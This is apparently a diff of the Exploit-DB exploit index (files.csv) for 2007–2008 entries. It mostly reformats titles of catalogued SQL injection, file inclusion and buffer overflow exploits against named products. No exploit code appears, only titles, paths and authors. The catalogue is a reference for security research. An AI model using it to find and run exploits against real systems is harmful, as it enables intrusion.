+4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Privilege Escalation",2007-09-27,"Robert Swiecki",linux,local,0 4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 @@ -4125,7 +4125,7 @@ id,file,description,date,author,platform,type,port 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0 4471,platforms/php/webapps/4471.txt,"phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion",2007-09-30,"Mehmet Ince",php,webapps,0 4472,platforms/php/webapps/4472.txt,"actSite 1.56 - 'news.php' Local File Inclusion",2007-10-01,DNX,php,webapps,0 -4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta - (base.php) Remote File Inclusion",2007-10-01,DNX,php,webapps,0 +4473,platforms/php/webapps/4473.txt,"actSite 1.991 Beta - 'base.php' Remote File Inclusion",2007-10-01,DNX,php,webapps,0 4474,platforms/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - FtpDownloadFile() Remote Buffer Overflow",2007-10-01,shinnai,windows,dos,0 4475,platforms/php/webapps/4475.php,"PHP-Fusion module Expanded Calendar 2.x - SQL Injection",2007-10-01,Matrix86,php,webapps,0 4476,platforms/php/webapps/4476.txt,"Segue CMS 1.8.4 - 'index.php' Remote File Inclusion",2007-10-01,kezzap66345,php,webapps,0 @@ -4231,7 +4231,7 @@ id,file,description,date,author,platform,type,port 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - 'action' Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 -4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - (GomWeb3.dll 1.0.0.12) Remote Overflow",2007-10-29,rgod,windows,remote,0 +4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,windows,remote,0 4580,platforms/php/webapps/4580.txt,"FireConfig 0.5 - (dl.php) Remote File Disclosure",2007-10-28,GoLd_M,php,webapps,0 4581,platforms/php/webapps/4581.txt,"Sige 0.1 - sige_init.php Remote File Inclusion",2007-10-28,GoLd_M,php,webapps,0 4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0 @@ -4352,9 +4352,9 @@ id,file,description,date,author,platform,type,port 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4699,platforms/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4700,platforms/windows/remote/4700.txt,"simple httpd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 -4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 - File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 -4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 MP4 - File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 -4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 +4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 +4702,platforms/windows/local/4702.pl,"Microsoft Windows Media Player 6.4 - '.MP4' File Stack Overflow (PoC)",2007-12-08,"SYS 49152",windows,local,0 +4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - .MP4 Tags Stack Overflow",2007-12-08,"SYS 49152",windows,local,0 4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure",2007-12-08,GoLd_M,php,webapps,0 4705,platforms/php/webapps/4705.txt,"Flat PHP Board 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0 4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 - 'index.php' SQL Injection",2007-12-09,S.W.A.T.,php,webapps,0 @@ -4367,7 +4367,7 @@ id,file,description,date,author,platform,type,port 4713,platforms/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 4715,platforms/windows/remote/4715.txt,"badblue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 -4716,platforms/windows/dos/4716.html,"Online Media Technologies AVSMJPEGFILE.DLL 1.1 - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 +4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 @@ -4436,7 +4436,7 @@ id,file,description,date,author,platform,type,port 4783,platforms/php/webapps/4783.txt,"Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion",2007-12-24,ShockShadow,php,webapps,0 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80 4785,platforms/php/webapps/4785.txt,"TeamCalPro 3.1.000 - Multiple Remote / Local File Inclusion",2007-12-25,GoLd_M,php,webapps,0 -4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 - (admin_users.php) Remote Add Administrator Exploit",2007-12-25,k1tk4t,php,webapps,0 +4786,platforms/php/webapps/4786.pl,"AuraCMS 2.2 - Remote Add Administrator",2007-12-25,k1tk4t,php,webapps,0 4787,platforms/php/webapps/4787.pl,"RunCMS 1.6 - Get Admin Cookie Blind SQL Injection",2007-12-25,sh2kerr,php,webapps,0 4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 - SQL Injection",2007-12-25,MhZ91,php,webapps,0 4789,platforms/php/webapps/4789.php,"PMOS Help Desk 2.4 - Remote Command Execution",2007-12-25,EgiX,php,webapps,0 @@ -4467,9 +4467,9 @@ id,file,description,date,author,platform,type,port 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0 -4818,platforms/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 -4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0 -4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 +4818,platforms/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Buffer Overflow",2007-12-30,Elazar,windows,remote,0 +4819,platforms/windows/remote/4819.html,"Macrovision Installshield - 'isusweb.dll' Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0 +4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - 'dwa7w.dll' Buffer Overflow",2007-12-30,Elazar,windows,remote,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0 4822,platforms/php/webapps/4822.txt,"MyPHP Forum 3.0 - (Final) Multiple SQL Injection",2007-12-31,x0kster,php,webapps,0 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0 @@ -4544,46 +4544,46 @@ id,file,description,date,author,platform,type,port 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 -4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 -4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 +4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Parameter Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 +4897,platforms/php/webapps/4897.pl,"photokron 1.7 - Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 4898,platforms/php/webapps/4898.txt,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps,0 4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - 'Username' SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 -4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - Buffer Overflow",2008-01-13,rgod,windows,remote,0 -4904,platforms/php/webapps/4904.txt,"Binn SBuilder - (nid) Blind SQL Injection",2008-01-13,JosS,php,webapps,0 +4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module 'PdvrAtl.DLL 1.0.1.25' - Buffer Overflow",2008-01-13,rgod,windows,remote,0 +4904,platforms/php/webapps/4904.txt,"Binn SBuilder - 'nid' Parameter Blind SQL Injection",2008-01-13,JosS,php,webapps,0 4905,platforms/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 4906,platforms/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - RTSP Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0 -4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection",2008-01-14,j0j0,php,webapps,0 +4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - 'topic' Parameter SQL Injection",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,windows,remote,0 -4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'showproduct.asp cat' SQL Injection",2008-01-14,JosS,asp,webapps,0 +4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'cat' Parameter SQL Injection",2008-01-14,JosS,asp,webapps,0 4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption (PoC)",2008-01-15,mu-b,windows,dos,0 -4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - (delete id) Remote Authentication Bypass",2008-01-15,ka0x,php,webapps,0 -4913,platforms/windows/remote/4913.html,"Macrovision FlexNet - isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 -4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 -4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 -4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition - 'show.php' SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 -4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 -4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - (CamPanel.dll 2.1.0.2) Buffer Overflow",2008-01-16,rgod,windows,remote,0 -4919,platforms/php/webapps/4919.txt,"Blog:CMS 4.2.1b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-16,DSecRG,php,webapps,0 -4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 - 'effect.php' Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 -4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - (ASP.NET) Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps,0 +4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - Remote Authentication Bypass",2008-01-15,ka0x,php,webapps,0 +4913,platforms/windows/remote/4913.html,"Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 +4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 +4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 +4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 +4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 +4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Buffer Overflow",2008-01-16,rgod,windows,remote,0 +4919,platforms/php/webapps/4919.txt,"Blog:CMS 4.2.1b - SQL Injection / Cross-Site Scripting",2008-01-16,DSecRG,php,webapps,0 +4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 - 'page' Parameter Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 +4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps,0 4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,php,webapps,0 -4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 +4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' Parameter SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - (agregar_info.php) Local File Inclusion",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"mybulletinboard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0 -4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 -4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 +4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 +4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - 'stat.php' Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow",2008-01-18,"Marcin Kozlowski",windows,remote,0 -4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos,0 +4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Dos",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 @@ -4594,7 +4594,7 @@ id,file,description,date,author,platform,type,port 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - explorerdir.php Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 -4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - (MeIpCamX.dll 1.0.0.4) Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0 +4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0 4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25 @@ -4617,7 +4617,7 @@ id,file,description,date,author,platform,type,port 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote,0 4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - (voircom.php id) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 @@ -4633,7 +4633,7 @@ id,file,description,date,author,platform,type,port 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0 4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0 -4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 +4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 - AddFile() Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 @@ -4646,13 +4646,13 @@ id,file,description,date,author,platform,type,port 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0 4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 -4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 +4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0 5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 - pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0 5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 -5004,platforms/windows/local/5004.c,"SafeNet IPSecDrv.sys 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 -5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 +5004,platforms/windows/local/5004.c,"SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 +5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 5007,platforms/php/webapps/5007.txt,"Mambo Component NewsLetter - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 5008,platforms/php/webapps/5008.txt,"Mambo Component Fq - (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 @@ -4673,7 +4673,7 @@ id,file,description,date,author,platform,type,port 5025,platforms/windows/remote/5025.html,"MySpace Uploader - (MySpaceUploader.ocx 1.0.0.4) Buffer Overflow",2008-01-31,Elazar,windows,remote,0 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0 -5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 +5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 @@ -4689,14 +4689,14 @@ id,file,description,date,author,platform,type,port 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0 5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (PoC)",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"Ipswitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow (PoC)",2008-02-03,securfrog,windows,dos,0 -5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll ActiveX Buffer Overflow",2008-02-03,plan-s,windows,remote,0 +5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' ActiveX Buffer Overflow",2008-02-03,plan-s,windows,remote,0 5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,windows,remote,0 5047,platforms/php/webapps/5047.txt,"Joomla! Component mosDirectory 2.3.2 - 'catid' SQL Injection",2008-02-03,GoLd_M,php,webapps,0 5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (2)",2008-02-03,exceed,windows,remote,0 5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader - (ImageUploader4.ocx 4.5.57.0) Buffer Overflow",2008-02-03,Elazar,windows,remote,0 5050,platforms/php/webapps/5050.pl,"A-Blog 2.0 - 'id' Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps,0 5051,platforms/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - AddButton() ActiveX Remote Buffer Overflow",2008-02-03,Elazar,windows,remote,0 -5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX mediagrid.dll AddBitmap() Buffer Overflow",2008-02-03,Elazar,windows,remote,0 +5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX 'mediagrid.dll' AddBitmap() Buffer Overflow",2008-02-03,Elazar,windows,remote,0 5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla! Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 @@ -4749,7 +4749,7 @@ id,file,description,date,author,platform,type,port 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd. ",windows,remote,0 5103,platforms/php/webapps/5103.txt,"Joomla! Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla! Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 -5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) SQL Injection",2008-02-12,DNX,php,webapps,0 +5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - 'albums' Pramater SQL Injection",2008-02-12,DNX,php,webapps,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - '.wps' Stack Overflow 